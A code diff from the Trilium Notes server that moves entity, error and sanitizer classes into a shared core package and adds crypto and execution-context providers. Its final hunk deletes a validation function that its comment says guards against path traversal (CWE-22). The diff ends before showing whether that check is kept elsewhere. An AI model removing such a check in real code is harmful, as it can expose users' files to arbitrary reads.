-        }
-
-        this.becca.childParentToBranch[`${this.noteId}-${this.parentNoteId}`] = this;
-
-        const childNote = this.childNote;
-
-        if (!childNote.parentBranches.includes(this)) {
-            childNote.parentBranches.push(this);
-        }
-
-        if (this.noteId === "root") {
-            return;
-        }
-
-        const parentNote = this.parentNote;
-        if (parentNote) {
-            if (!childNote.parents.includes(parentNote)) {
-                childNote.parents.push(parentNote);
-            }
-
-            if (!parentNote.children.includes(childNote)) {
-                parentNote.children.push(childNote);
-            }
-        }
-    }
-
-    get childNote(): BNote {
-        if (!(this.noteId in this.becca.notes)) {
-            // entities can come out of order in sync/import, create skeleton which will be filled later
-            this.becca.addNote(this.noteId, new BNote({ noteId: this.noteId }));
-        }
-
-        return this.becca.notes[this.noteId];
-    }
-
-    getNote(): BNote {
-        return this.childNote;
-    }
-
-    /** @returns root branch will have undefined parent, all other branches have to have a parent note */
-    get parentNote(): BNote | undefined {
-        if (!(this.parentNoteId in this.becca.notes) && this.parentNoteId !== "none") {
-            // entities can come out of order in sync/import, create skeleton which will be filled later
-            this.becca.addNote(this.parentNoteId, new BNote({ noteId: this.parentNoteId }));
-        }
-
-        return this.becca.notes[this.parentNoteId];
-    }
-
-    override get isDeleted() {
-        return this.branchId == undefined || !(this.branchId in this.becca.branches);
-    }
-
-    /**
-     * Branch is weak when its existence should not hinder deletion of its note.
-     * As a result, note with only weak branches should be immediately deleted.
-     * An example is shared or bookmarked clones - they are created automatically and exist for technical reasons,
-     * not as user-intended actions. From user perspective, they don't count as real clones and for the purpose
-     * of deletion should not act as a clone.
-     */
-    get isWeak() {
-        return ["_share", "_lbBookmarks"].includes(this.parentNoteId);
-    }
-
-    /**
-     * Delete a branch. If this is a last note's branch, delete the note as well.
-     *
-     * @param deleteId - optional delete identified
-     *
-     * @returns true if note has been deleted, false otherwise
-     */
-    deleteBranch(deleteId?: string, taskContext?: TaskContext<"deleteNotes">): boolean {
-        if (!deleteId) {
-            deleteId = utils.randomString(10);
-        }
-
-        if (!taskContext) {
-            taskContext = new TaskContext("no-progress-reporting", "deleteNotes", null);
-        }
-
-        taskContext.increaseProgressCount();
-
-        const note = this.getNote();
-
-        if (!taskContext.noteDeletionHandlerTriggered) {
-            const parentBranches = note.getParentBranches();
-
-            if (parentBranches.length === 1 && parentBranches[0] === this) {
-                // needs to be run before branches and attributes are deleted and thus attached relations disappear
-                handlers.runAttachedRelations(note, "runOnNoteDeletion", note);
-            }
-        }
-
-        if ((this.noteId === "root" || this.noteId === cls.getHoistedNoteId()) && !this.isWeak) {
-            throw new Error("Can't delete root or hoisted branch/note");
-        }
-
-        this.markAsDeleted(deleteId);
-
-        const notDeletedBranches = note.getStrongParentBranches();
-
-        if (notDeletedBranches.length === 0) {
-            for (const weakBranch of note.getParentBranches()) {
-                weakBranch.markAsDeleted(deleteId);
-            }
-
-            for (const childBranch of note.getChildBranches()) {
-                if (childBranch) {
-                    childBranch.deleteBranch(deleteId, taskContext);
-                }
-            }
-
-            // first delete children and then parent - this will show up better in recent changes
-
-            log.info(`Deleting note '${note.noteId}'`);
-
-            this.becca.notes[note.noteId].isBeingDeleted = true;
-
-            for (const attribute of note.getOwnedAttributes().slice()) {
-                attribute.markAsDeleted(deleteId);
-            }
-
-            for (const relation of note.getTargetRelations()) {
-                relation.markAsDeleted(deleteId);
-            }
-
-            for (const attachment of note.getAttachments()) {
-                attachment.markAsDeleted(deleteId);
-            }
-
-            note.markAsDeleted(deleteId);
-
-            return true;
-        } else {
-            return false;
-        }
-    }
-
-    override beforeSaving() {
-        if (!this.noteId || !this.parentNoteId) {
-            throw new Error(`noteId and parentNoteId are mandatory properties for Branch`);
-        }
-
-        this.branchId = `${this.parentNoteId}_${this.noteId}`;
-
-        if (this.notePosition === undefined || this.notePosition === null) {
-            let maxNotePos = 0;
-
-            if (this.parentNote) {
-                for (const childBranch of this.parentNote.getChildBranches()) {
-                    if (!childBranch) {
-                        continue;
-                    }
-
-                    if (
-                        maxNotePos < childBranch.notePosition &&
-                        childBranch.noteId !== "_hidden" // hidden has a very large notePosition to always stay last
-                    ) {
-                        maxNotePos = childBranch.notePosition;
-                    }
-                }
-            }
-
-            this.notePosition = maxNotePos + 10;
-        }
-
-        if (!this.isExpanded) {
-            this.isExpanded = false;
-        }
-
-        if (!this.prefix?.trim()) {
-            this.prefix = null;
-        }
-
-        this.utcDateModified = dateUtils.utcNowDateTime();
-
-        super.beforeSaving();
-
-        this.becca.branches[this.branchId] = this;
-    }
-
-    getPojo() {
-        return {
-            branchId: this.branchId,
-            noteId: this.noteId,
-            parentNoteId: this.parentNoteId,
-            prefix: this.prefix,
-            notePosition: this.notePosition,
-            isExpanded: this.isExpanded,
-            isDeleted: false,
-            utcDateModified: this.utcDateModified
-        };
-    }
-
-    createClone(parentNoteId: string, notePosition?: number) {
-        const existingBranch = this.becca.getBranchFromChildAndParent(this.noteId, parentNoteId);
-
-        if (existingBranch) {
-            if (notePosition) {
-                existingBranch.notePosition = notePosition;
-            }
-            return existingBranch;
-        } else {
-            return new BBranch({
-                noteId: this.noteId,
-                parentNoteId: parentNoteId,
-                notePosition: notePosition || null,
-                prefix: this.prefix,
-                isExpanded: this.isExpanded
-            });
-        }
-    }
-
-    getParentNote() {
-        return this.parentNote;
-    }
-
-}
-
+import { BBranch } from "@triliumnext/core";
 export default BBranch;

apps/server/src/becca/entities/betapi_token.ts

@@ -1,89 +1,2 @@
-"use strict";
-
-import type { EtapiTokenRow } from "@triliumnext/commons";
-
-import dateUtils from "../../services/date_utils.js";
-import AbstractBeccaEntity from "./abstract_becca_entity.js";
-
-/**
- * EtapiToken is an entity representing token used to authenticate against Trilium REST API from client applications.
- * Used by:
- * - Trilium Sender
- * - ETAPI clients
- *
- * The format user is presented with is "<etapiTokenId>_<tokenHash>". This is also called "authToken" to distinguish it
- * from tokenHash and token.
- */
-class BEtapiToken extends AbstractBeccaEntity<BEtapiToken> {
-    static get entityName() {
-        return "etapi_tokens";
-    }
-    static get primaryKeyName() {
-        return "etapiTokenId";
-    }
-    static get hashedProperties() {
-        return ["etapiTokenId", "name", "tokenHash", "utcDateCreated", "utcDateModified", "isDeleted"];
-    }
-
-    etapiTokenId?: string;
-    name!: string;
-    tokenHash!: string;
-    private _isDeleted?: boolean;
-
-    constructor(row?: EtapiTokenRow) {
-        super();
-
-        if (!row) {
-            return;
-        }
-
-        this.updateFromRow(row);
-        this.init();
-    }
-
-    override get isDeleted() {
-        return !!this._isDeleted;
-    }
-
-    updateFromRow(row: EtapiTokenRow) {
-        this.etapiTokenId = row.etapiTokenId;
-        this.name = row.name;
-        this.tokenHash = row.tokenHash;
-        this.utcDateCreated = row.utcDateCreated || dateUtils.utcNowDateTime();
-        this.utcDateModified = row.utcDateModified || this.utcDateCreated;
-        this._isDeleted = !!row.isDeleted;
-
-        if (this.etapiTokenId) {
-            this.becca.etapiTokens[this.etapiTokenId] = this;
-        }
-    }
-
-    override init() {
-        if (this.etapiTokenId) {
-            this.becca.etapiTokens[this.etapiTokenId] = this;
-        }
-    }
-
-    getPojo() {
-        return {
-            etapiTokenId: this.etapiTokenId,
-            name: this.name,
-            tokenHash: this.tokenHash,
-            utcDateCreated: this.utcDateCreated,
-            utcDateModified: this.utcDateModified,
-            isDeleted: this.isDeleted
-        };
-    }
-
-    override beforeSaving() {
-        this.utcDateModified = dateUtils.utcNowDateTime();
-
-        super.beforeSaving();
-
-        if (this.etapiTokenId) {
-            this.becca.etapiTokens[this.etapiTokenId] = this;
-        }
-    }
-}
-
+import { BEtapiToken } from "@triliumnext/core";
 export default BEtapiToken;

apps/server/src/becca/entities/boption.ts

@@ -1,56 +1,2 @@
-"use strict";
-
-import dateUtils from "../../services/date_utils.js";
-import AbstractBeccaEntity from "./abstract_becca_entity.js";
-import type { OptionRow } from "@triliumnext/commons";
-
-/**
- * Option represents a name-value pair, either directly configurable by the user or some system property.
- */
-class BOption extends AbstractBeccaEntity<BOption> {
-    static get entityName() {
-        return "options";
-    }
-    static get primaryKeyName() {
-        return "name";
-    }
-    static get hashedProperties() {
-        return ["name", "value"];
-    }
-
-    name!: string;
-    value!: string;
-
-    constructor(row?: OptionRow) {
-        super();
-
-        if (row) {
-            this.updateFromRow(row);
-        }
-        this.becca.options[this.name] = this;
-    }
-
-    updateFromRow(row: OptionRow) {
-        this.name = row.name;
-        this.value = row.value;
-        this.isSynced = !!row.isSynced;
-        this.utcDateModified = row.utcDateModified;
-    }
-
-    override beforeSaving() {
-        super.beforeSaving();
-
-        this.utcDateModified = dateUtils.utcNowDateTime();
-    }
-
-    getPojo() {
-        return {
-            name: this.name,
-            value: this.value,
-            isSynced: this.isSynced,
-            utcDateModified: this.utcDateModified
-        };
-    }
-}
-
+import { BOption } from "@triliumnext/core";
 export default BOption;

apps/server/src/becca/entities/brecent_note.ts

@@ -1,46 +1,2 @@
-"use strict";
-
-import type { RecentNoteRow } from "@triliumnext/commons";
-
-import dateUtils from "../../services/date_utils.js";
-import AbstractBeccaEntity from "./abstract_becca_entity.js";
-
-/**
- * RecentNote represents recently visited note.
- */
-class BRecentNote extends AbstractBeccaEntity<BRecentNote> {
-    static get entityName() {
-        return "recent_notes";
-    }
-    static get primaryKeyName() {
-        return "noteId";
-    }
-    static get hashedProperties() {
-        return ["noteId", "notePath"];
-    }
-
-    noteId!: string;
-    notePath!: string;
-
-    constructor(row: RecentNoteRow) {
-        super();
-
-        this.updateFromRow(row);
-    }
-
-    updateFromRow(row: RecentNoteRow): void {
-        this.noteId = row.noteId;
-        this.notePath = row.notePath;
-        this.utcDateCreated = row.utcDateCreated || dateUtils.utcNowDateTime();
-    }
-
-    getPojo() {
-        return {
-            noteId: this.noteId,
-            notePath: this.notePath,
-            utcDateCreated: this.utcDateCreated
-        };
-    }
-}
-
+import { BRecentNote } from "@triliumnext/core";
 export default BRecentNote;

apps/server/src/becca/entities/brevision.ts

@@ -1,225 +1,2 @@
-"use strict";
-
-import protectedSessionService from "../../services/protected_session.js";
-import utils from "../../services/utils.js";
-import dateUtils from "../../services/date_utils.js";
-import becca from "../becca.js";
-import AbstractBeccaEntity from "./abstract_becca_entity.js";
-import sql from "../../services/sql.js";
-import BAttachment from "./battachment.js";
-import type { AttachmentRow, NoteType, RevisionPojo, RevisionRow } from "@triliumnext/commons";
-import eraseService from "../../services/erase.js";
-
-interface ContentOpts {
-    /** will also save this BRevision entity */
-    forceSave?: boolean;
-}
-
-interface GetByIdOpts {
-    includeContentLength?: boolean;
-}
-
-/**
- * Revision represents a snapshot of note's title and content at some point in the past.
- * It's used for seamless note versioning.
- */
-class BRevision extends AbstractBeccaEntity<BRevision> {
-    static get entityName() {
-        return "revisions";
-    }
-    static get primaryKeyName() {
-        return "revisionId";
-    }
-    static get hashedProperties() {
-        return ["revisionId", "noteId", "title", "isProtected", "dateLastEdited", "dateCreated", "utcDateLastEdited", "utcDateCreated", "utcDateModified", "blobId"];
-    }
-
-    revisionId?: string;
-    noteId!: string;
-    type!: NoteType;
-    mime!: string;
-    title!: string;
-    dateLastEdited?: string;
-    utcDateLastEdited?: string;
-    contentLength?: number;
-    content?: string | Buffer;
-
-    constructor(row: RevisionRow, titleDecrypted = false) {
-        super();
-
-        this.updateFromRow(row);
-        if (this.isProtected && !titleDecrypted) {
-            const decryptedTitle = protectedSessionService.isProtectedSessionAvailable() ? protectedSessionService.decryptString(this.title) : null;
-            this.title = decryptedTitle || "[protected]";
-        }
-    }
-
-    updateFromRow(row: RevisionRow) {
-        this.revisionId = row.revisionId;
-        this.noteId = row.noteId;
-        this.type = row.type;
-        this.mime = row.mime;
-        this.isProtected = !!row.isProtected;
-        this.title = row.title;
-        this.blobId = row.blobId;
-        this.dateLastEdited = row.dateLastEdited;
-        this.dateCreated = row.dateCreated;
-        this.utcDateLastEdited = row.utcDateLastEdited;
-        this.utcDateCreated = row.utcDateCreated;
-        this.utcDateModified = row.utcDateModified;
-        this.contentLength = row.contentLength;
-    }
-
-    getNote() {
-        return becca.notes[this.noteId];
-    }
-
-    /** @returns true if the note has string content (not binary) */
-    override hasStringContent(): boolean {
-        return utils.isStringNote(this.type, this.mime);
-    }
-
-    isContentAvailable() {
-        return (
-            !this.revisionId || // new note which was not encrypted yet
-            !this.isProtected ||
-            protectedSessionService.isProtectedSessionAvailable()
-        );
-    }
-
-    /*
-     * Note revision content has quite special handling - it's not a separate entity, but a lazily loaded
-     * part of Revision entity with its own sync. The reason behind this hybrid design is that
-     * content can be quite large, and it's not necessary to load it / fill memory for any note access even
-     * if we don't need a content, especially for bulk operations like search.
-     *
-     * This is the same approach as is used for Note's content.
-     */
-    getContent(): string | Buffer {
-        return this._getContent();
-    }
-
-    /**
-     * @throws Error in case of invalid JSON */
-    getJsonContent(): {} | null {
-        const content = this.getContent();
-
-        if (!content || typeof content !== "string" || !content.trim()) {
-            return null;
-        }
-
-        return JSON.parse(content);
-    }
-
-    /** @returns valid object or null if the content cannot be parsed as JSON */
-    getJsonContentSafely(): {} | null {
-        try {
-            return this.getJsonContent();
-        } catch (e) {
-            return null;
-        }
-    }
-
-    setContent(content: string | Buffer, opts: ContentOpts = {}) {
-        this._setContent(content, opts);
-    }
-
-    getAttachments(): BAttachment[] {
-        return sql
-            .getRows<AttachmentRow>(
-                `
-                SELECT attachments.*
-                FROM attachments
-                WHERE ownerId = ?
-                AND isDeleted = 0`,
-                [this.revisionId]
-            )
-            .map((row) => new BAttachment(row));
-    }
-
-    getAttachmentById(attachmentId: String, opts: GetByIdOpts = {}): BAttachment | null {
-        opts.includeContentLength = !!opts.includeContentLength;
-
-        const query = opts.includeContentLength
-            ? /*sql*/`SELECT attachments.*, LENGTH(blobs.content) AS contentLength
-                FROM attachments
-                JOIN blobs USING (blobId)
-                WHERE ownerId = ? AND attachmentId = ? AND isDeleted = 0`
-            : /*sql*/`SELECT * FROM attachments WHERE ownerId = ? AND attachmentId = ? AND isDeleted = 0`;
-
-        return sql.getRows<AttachmentRow>(query, [this.revisionId, attachmentId]).map((row) => new BAttachment(row))[0];
-    }
-
-    getAttachmentsByRole(role: string): BAttachment[] {
-        return sql
-            .getRows<AttachmentRow>(
-                `
-                SELECT attachments.*
-                FROM attachments
-                WHERE ownerId = ?
-                AND role = ?
-                AND isDeleted = 0
-                ORDER BY position`,
-                [this.revisionId, role]
-            )
-            .map((row) => new BAttachment(row));
-    }
-
-    getAttachmentByTitle(title: string): BAttachment {
-        // cannot use SQL to filter by title since it can be encrypted
-        return this.getAttachments().filter((attachment) => attachment.title === title)[0];
-    }
-
-    /**
-     * Revisions are not soft-deletable, they are immediately hard-deleted (erased).
-     */
-    eraseRevision() {
-        if (this.revisionId) {
-            eraseService.eraseRevisions([this.revisionId]);
-        }
-    }
-
-    override beforeSaving() {
-        super.beforeSaving();
-
-        this.utcDateModified = dateUtils.utcNowDateTime();
-    }
-
-    getPojo() {
-        return {
-            revisionId: this.revisionId,
-            noteId: this.noteId,
-            type: this.type,
-            mime: this.mime,
-            isProtected: this.isProtected,
-            title: this.title,
-            blobId: this.blobId,
-            dateLastEdited: this.dateLastEdited,
-            dateCreated: this.dateCreated,
-            utcDateLastEdited: this.utcDateLastEdited,
-            utcDateCreated: this.utcDateCreated,
-            utcDateModified: this.utcDateModified,
-            content: this.content, // used when retrieving full note revision to frontend
-            contentLength: this.contentLength
-        } satisfies RevisionPojo;
-    }
-
-    override getPojoToSave() {
-        const pojo = this.getPojo();
-        delete pojo.content; // not getting persisted
-        delete pojo.contentLength; // not getting persisted
-
-        if (pojo.isProtected) {
-            if (protectedSessionService.isProtectedSessionAvailable()) {
-                pojo.title = protectedSessionService.encrypt(this.title) ?? "";
-            } else {
-                // updating protected note outside of protected session means we will keep original ciphertexts
-                pojo.title = "";
-            }
-        }
-
-        return pojo;
-    }
-}
-
+import { BRevision } from "@triliumnext/core";
 export default BRevision;

apps/server/src/cls_provider.ts

@@ -0,0 +1,24 @@
+import { ExecutionContext } from "@triliumnext/core";
+import clsHooked from "cls-hooked";
+
+export const namespace = clsHooked.createNamespace("trilium");
+
+export default class ClsHookedExecutionContext implements ExecutionContext {
+
+    get<T = any>(key: string): T | undefined {
+        return namespace.get(key);
+    }
+
+    set(key: string, value: any): void {
+        namespace.set(key, value);
+    }
+
+    reset(): void {
+        clsHooked.reset();
+    }
+
+    init<T>(callback: () => T): T {
+        return namespace.runAndReturn(callback);
+    }
+
+}

apps/server/src/crypto_provider.ts

@@ -0,0 +1,35 @@
+import { CryptoProvider } from "@triliumnext/core";
+import crypto from "crypto";
+import { generator } from "rand-token";
+
+const randtoken = generator({ source: "crypto" });
+
+export default class NodejsCryptoProvider implements CryptoProvider {
+
+    createHash(algorithm: "sha1", content: string | Uint8Array): Uint8Array {
+        return crypto.createHash(algorithm).update(content).digest();
+    }
+
+    createCipheriv(algorithm: "aes-128-cbc", key: Uint8Array, iv: Uint8Array): { update(data: Uint8Array): Uint8Array; final(): Uint8Array; } {
+        return crypto.createCipheriv(algorithm, key, iv);
+    }
+
+    createDecipheriv(algorithm: "aes-128-cbc", key: Uint8Array, iv: Uint8Array) {
+        return crypto.createDecipheriv(algorithm, key, iv);
+    }
+
+    randomBytes(size: number): Uint8Array {
+        return crypto.randomBytes(size);
+    }
+
+    randomString(length: number): string {
+        return randtoken.generate(length);
+    }
+
+    hmac(secret: string | Uint8Array, value: string | Uint8Array) {
+        const hmac = crypto.createHmac("sha256", Buffer.from(secret.toString(), "ascii"));
+        hmac.update(value.toString());
+        return hmac.digest("base64");
+    }
+
+}

apps/server/src/errors/forbidden_error.ts

@@ -1,12 +0,0 @@
-import HttpError from "./http_error.js";
-
-class ForbiddenError extends HttpError {
-
-    constructor(message: string) {
-        super(message, 403);
-        this.name = "ForbiddenError";
-    }
-
-}
-
-export default ForbiddenError;

apps/server/src/errors/http_error.ts

@@ -1,13 +0,0 @@
-class HttpError extends Error {
-
-    statusCode: number;
-
-    constructor(message: string, statusCode: number) {
-        super(message);
-        this.name = "HttpError";
-        this.statusCode = statusCode;
-    }
-
-}
-
-export default HttpError;

apps/server/src/errors/not_found_error.ts

@@ -1,12 +0,0 @@
-import HttpError from "./http_error.js";
-
-class NotFoundError extends HttpError {
-
-    constructor(message: string) {
-        super(message, 404);
-        this.name = "NotFoundError";
-    }
-
-}
-
-export default NotFoundError;

apps/server/src/errors/open_id_error.ts

@@ -1,9 +0,0 @@
-class OpenIdError {
-    message: string;
-
-    constructor(message: string) {
-        this.message = message;
-    }
-}
-
-export default OpenIdError;

apps/server/src/errors/validation_error.ts

@@ -1,12 +0,0 @@
-import HttpError from "./http_error.js";
-
-class ValidationError extends HttpError {
-
-    constructor(message: string) {
-        super(message, 400)
-        this.name = "ValidationError";
-    }
-
-}
-
-export default ValidationError;

apps/server/src/etapi/etapi_utils.ts

@@ -2,6 +2,7 @@ import type { NextFunction, Request, RequestHandler, Response, Router } from "ex
 import type { ParamsDictionary } from "express-serve-static-core";
 
 import becca from "../becca/becca.js";
+import { namespace } from "../cls_provider.js";
 import type { ApiRequestHandler, SyncRouteRequestHandler } from "../routes/route_api.js";
 import cls from "../services/cls.js";
 import config from "../services/config.js";
@@ -53,8 +54,8 @@ function checkEtapiAuth(req: Request, res: Response, next: NextFunction) {
 
 function processRequest<P extends ParamsDictionary>(req: Request<P>, res: Response, routeHandler: ApiRequestHandler<P>, next: NextFunction, method: string, path: string) {
     try {
-        cls.namespace.bindEmitter(req);
-        cls.namespace.bindEmitter(res);
+        namespace.bindEmitter(req);
+        namespace.bindEmitter(res);
 
         cls.init(() => {
             cls.set("componentId", "etapi");
@@ -90,6 +91,7 @@ function getAndCheckNote(noteId: string) {
         return note;
     }
     throw new EtapiError(404, "NOTE_NOT_FOUND", `Note '${noteId}' not found.`);
+
 }
 
 function getAndCheckAttachment(attachmentId: string) {
@@ -99,6 +101,7 @@ function getAndCheckAttachment(attachmentId: string) {
         return attachment;
     }
     throw new EtapiError(404, "ATTACHMENT_NOT_FOUND", `Attachment '${attachmentId}' not found.`);
+
 }
 
 function getAndCheckBranch(branchId: string) {
@@ -108,6 +111,7 @@ function getAndCheckBranch(branchId: string) {
         return branch;
     }
     throw new EtapiError(404, "BRANCH_NOT_FOUND", `Branch '${branchId}' not found.`);
+
 }
 
 function getAndCheckAttribute(attributeId: string) {
@@ -117,6 +121,7 @@ function getAndCheckAttribute(attributeId: string) {
         return attribute;
     }
     throw new EtapiError(404, "ATTRIBUTE_NOT_FOUND", `Attribute '${attributeId}' not found.`);
+
 }
 
 function getAndCheckRevision(revisionId: string) {

apps/server/src/etapi/notes.ts

@@ -1,3 +1,4 @@
+import { NoteParams } from "@triliumnext/core";
 import type { Request, Router } from "express";
 import type { ParsedQs } from "qs";
 
@@ -5,7 +6,6 @@ import becca from "../becca/becca.js";
 import zipExportService from "../services/export/zip.js";
 import type { ExportFormat } from "../services/export/zip/abstract_provider.js";
 import zipImportService from "../services/import/zip.js";
-import type { NoteParams } from "../services/note-interface.js";
 import noteService from "../services/notes.js";
 import SearchContext from "../services/search/search_context.js";
 import searchService from "../services/search/services/search.js";

apps/server/src/main.ts

@@ -3,10 +3,61 @@
  * are loaded later and will result in an empty string.
  */
 
-import { initializeTranslations } from "./services/i18n.js";
+import fs from "fs";
+import { initializeCore } from "@triliumnext/core";
+import path from "path";
+
+import ClsHookedExecutionContext from "./cls_provider.js";
+import NodejsCryptoProvider from "./crypto_provider.js";
+import dataDirs from "./services/data_dir.js";
+import NodeRequestProvider from "./services/request.js";
+import WebSocketMessagingProvider from "./services/ws_messaging_provider.js";
+import BetterSqlite3Provider from "./sql_provider.js";
 
 async function startApplication() {
-    await initializeTranslations();
+    const config = (await import("./services/config.js")).default;
+    const { DOCUMENT_PATH } = (await import("./services/data_dir.js")).default;
+
+    const dbProvider = new BetterSqlite3Provider();
+    dbProvider.loadFromFile(DOCUMENT_PATH, config.General.readOnly);
+
+    await initializeCore({
+        dbConfig: {
+            provider: dbProvider,
+            isReadOnly: config.General.readOnly,
+            async onTransactionCommit() {
+                const ws = (await import("./services/ws.js")).default;
+                ws.sendTransactionEntityChangesToAllClients();
+            },
+            async onTransactionRollback() {
+                const cls = (await import("./services/cls.js")).default;
+                const becca_loader = (await import("@triliumnext/core")).becca_loader;
+                const entity_changes = (await import("./services/entity_changes.js")).default;
+                const log = (await import("./services/log")).default;
+
+                const entityChangeIds = cls.getAndClearEntityChangeIds();
+
+                if (entityChangeIds.length > 0) {
+                    log.info("Transaction rollback dirtied the becca, forcing reload.");
+
+                    becca_loader.load();
+                }
+
+                // the maxEntityChangeId has been incremented during failed transaction, need to recalculate
+                entity_changes.recalculateMaxEntityChangeId();
+            },
+        },
+        crypto: new NodejsCryptoProvider(),
+        request: new NodeRequestProvider(),
+        executionContext: new ClsHookedExecutionContext(),
+        messaging: new WebSocketMessagingProvider(),
+        schema: fs.readFileSync(require.resolve("@triliumnext/core/src/assets/schema.sql"), "utf-8"),
+        translations: (await import("./services/i18n.js")).initializeTranslations,
+        extraAppInfo: {
+            nodeVersion: process.version,
+            dataDirectory: path.resolve(dataDirs.TRILIUM_DATA_DIR)
+        }
+    });
     const startTriliumServer = (await import("./www.js")).default;
     await startTriliumServer();
 }

apps/server/src/migrations/0220__migrate_images_to_attachments.ts

@@ -1,5 +1,6 @@
+import { becca_loader } from "@triliumnext/core";
+
 import becca from "../becca/becca.js";
-import becca_loader from "../becca/becca_loader.js";
 import cls from "../services/cls.js";
 import log from "../services/log.js";
 import sql from "../services/sql.js";

apps/server/src/migrations/0233__migrate_geo_map_to_collection.ts

@@ -1,5 +1,6 @@
+import { becca_loader } from "@triliumnext/core";
+
 import becca from "../becca/becca";
-import becca_loader from "../becca/becca_loader";
 import cls from "../services/cls.js";
 import hidden_subtree from "../services/hidden_subtree";
 

apps/server/src/routes/api/clipper.ts

@@ -1,16 +1,15 @@
+import { sanitize, ValidationError } from "@triliumnext/core";
 import type { Request } from "express";
 import { parse } from "node-html-parser";
 import path from "path";
 
 import type BNote from "../../becca/entities/bnote.js";
-import ValidationError from "../../errors/validation_error.js";
 import appInfo from "../../services/app_info.js";
 import attributeFormatter from "../../services/attribute_formatter.js";
 import attributeService from "../../services/attributes.js";
 import cloneService from "../../services/cloning.js";
 import dateNoteService from "../../services/date_notes.js";
 import dateUtils from "../../services/date_utils.js";
-import htmlSanitizer from "../../services/html_sanitizer.js";
 import imageService from "../../services/image.js";
 import log from "../../services/log.js";
 import noteService from "../../services/notes.js";
@@ -32,7 +31,7 @@ async function addClipping(req: Request) {
 
     const clipperInbox = await getClipperInboxNote();
 
-    const pageUrl = htmlSanitizer.sanitizeUrl(req.body.pageUrl);
+    const pageUrl = sanitize.sanitizeUrl(req.body.pageUrl);
     let clippingNote = findClippingNote(clipperInbox, pageUrl, clipType);
 
     if (!clippingNote) {
@@ -99,8 +98,8 @@ async function getClipperInboxNote() {
 async function createNote(req: Request) {
     const { content, images, labels } = req.body;
 
-    const clipType = htmlSanitizer.sanitize(req.body.clipType);
-    const pageUrl = htmlSanitizer.sanitizeUrl(req.body.pageUrl);
+    const clipType = sanitize.sanitizeHtml(req.body.clipType);
+    const pageUrl = sanitize.sanitizeUrl(req.body.pageUrl);
 
     const trimmedTitle = (typeof req.body.title === "string") ? req.body.title.trim() : "";
     const title = trimmedTitle || `Clipped note from ${pageUrl}`;
@@ -126,7 +125,7 @@ async function createNote(req: Request) {
 
     if (labels) {
         for (const labelName in labels) {
-            const labelValue = htmlSanitizer.sanitize(labels[labelName]);
+            const labelValue = sanitize.sanitizeHtml(labels[labelName]);
             note.setLabel(labelName, labelValue);
         }
     }
@@ -147,7 +146,7 @@ async function createNote(req: Request) {
 }
 
 export function processContent(images: Image[], note: BNote, content: string) {
-    let rewrittenContent = htmlSanitizer.sanitize(content);
+    let rewrittenContent = sanitize.sanitizeHtml(content);
 
     if (images) {
         for (const { src, dataUrl, imageId } of images) {
@@ -198,11 +197,10 @@ function openNote(req: Request<{ noteId: string }>) {
         return {
             result: "ok"
         };
-    } 
+    }
     return {
         result: "open-in-browser"
     };
-    
 }
 
 function handshake() {

apps/server/src/routes/api/database.ts

@@ -1,15 +1,13 @@
-"use strict";
-
-import sql from "../../services/sql.js";
-import log from "../../services/log.js";
-import backupService from "../../services/backup.js";
-import anonymizationService from "../../services/anonymization.js";
-import consistencyChecksService from "../../services/consistency_checks.js";
-import type { Request } from "express";
-import ValidationError from "../../errors/validation_error.js";
-import sql_init from "../../services/sql_init.js";
-import becca_loader from "../../becca/becca_loader.js";
 import { BackupDatabaseNowResponse, DatabaseCheckIntegrityResponse } from "@triliumnext/commons";
+import { becca_loader, ValidationError } from "@triliumnext/core";
+import type { Request } from "express";
+
+import anonymizationService from "../../services/anonymization.js";
+import backupService from "../../services/backup.js";
+import consistencyChecksService from "../../services/consistency_checks.js";
+import log from "../../services/log.js";
+import sql from "../../services/sql.js";
+import sql_init from "../../services/sql_init.js";
 
 function getExistingBackups() {
     return backupService.getExistingBackups();

apps/server/src/routes/api/export.ts

@@ -1,8 +1,7 @@
+import { NotFoundError, ValidationError } from "@triliumnext/core";
 import type { Request, Response } from "express";
 
 import becca from "../../becca/becca.js";
-import NotFoundError from "../../errors/not_found_error.js";
-import ValidationError from "../../errors/validation_error.js";
 import opmlExportService from "../../services/export/opml.js";
 import singleExportService from "../../services/export/single.js";
 import zipExportService from "../../services/export/zip.js";

apps/server/src/routes/api/files.ts

@@ -1,14 +1,13 @@
+import { ValidationError } from "@triliumnext/core";
 import chokidar from "chokidar";
 import type { Request, Response } from "express";
 import fs from "fs";
-import path from "path";
 import { Readable } from "stream";
 import tmp from "tmp";
 
 import becca from "../../becca/becca.js";
 import type BAttachment from "../../becca/entities/battachment.js";
 import type BNote from "../../becca/entities/bnote.js";
-import ValidationError from "../../errors/validation_error.js";
 import dataDirs from "../../services/data_dir.js";
 import log from "../../services/log.js";
 import noteService from "../../services/notes.js";
@@ -122,7 +121,7 @@ function attachmentContentProvider(req: Request<{ attachmentId: string }>) {
     return streamContent(attachment.getContent(), attachment.getFileName(), attachment.mime);
 }
 
-async function streamContent(content: string | Buffer, fileName: string, mimeType: string) {
+async function streamContent(content: string | Uint8Array, fileName: string, mimeType: string) {
     if (typeof content === "string") {
         content = Buffer.from(content, "utf8");
     }
@@ -169,7 +168,7 @@ function saveAttachmentToTmpDir(req: Request<{ attachmentId: string }>) {
 
 const createdTemporaryFiles = new Set<string>();
 
-function saveToTmpDir(fileName: string, content: string | Buffer, entityType: string, entityId: string) {
+function saveToTmpDir(fileName: string, content: string | Uint8Array, entityType: string, entityId: string) {
     const tmpObj = tmp.fileSync({
         postfix: fileName,
         tmpdir: dataDirs.TMP_DIR
@@ -204,36 +203,13 @@ function saveToTmpDir(fileName: string, content: string | Buffer, entityType: st
     };
 }
 
-/**
- * Validates that the given file path is a known temporary file created by this server
- * and resides within the expected temporary directory. This prevents path traversal
- * attacks (CWE-22) where an attacker could read arbitrary files from the filesystem.
- */
-function validateTemporaryFilePath(filePath: string): void {
-    if (!filePath || typeof filePath !== "string") {
-        throw new ValidationError("Missing or invalid file path.");
-    }
-
-    // Check 1: The file must be in our set of known temporary files created by saveToTmpDir().
-    if (!createdTemporaryFiles.has(filePath)) {
-        throw new ValidationError(`File '${filePath}' is not a tracked temporary file.`);
-    }
-
-    // Check 2 (defense-in-depth): Resolve to an absolute path and verify it is within TMP_DIR.
-    // This guards against any future bugs where a non-temp path could end up in the set.
-    const resolvedPath = path.resolve(filePath);
-    const resolvedTmpDir = path.resolve(dataDirs.TMP_DIR);
-
-    if (!resolvedPath.startsWith(resolvedTmpDir + path.sep) && resolvedPath !== resolvedTmpDir) {
-        throw new ValidationError(`File path '${filePath}' is outside the temporary directory.`);
-    }
-}
-
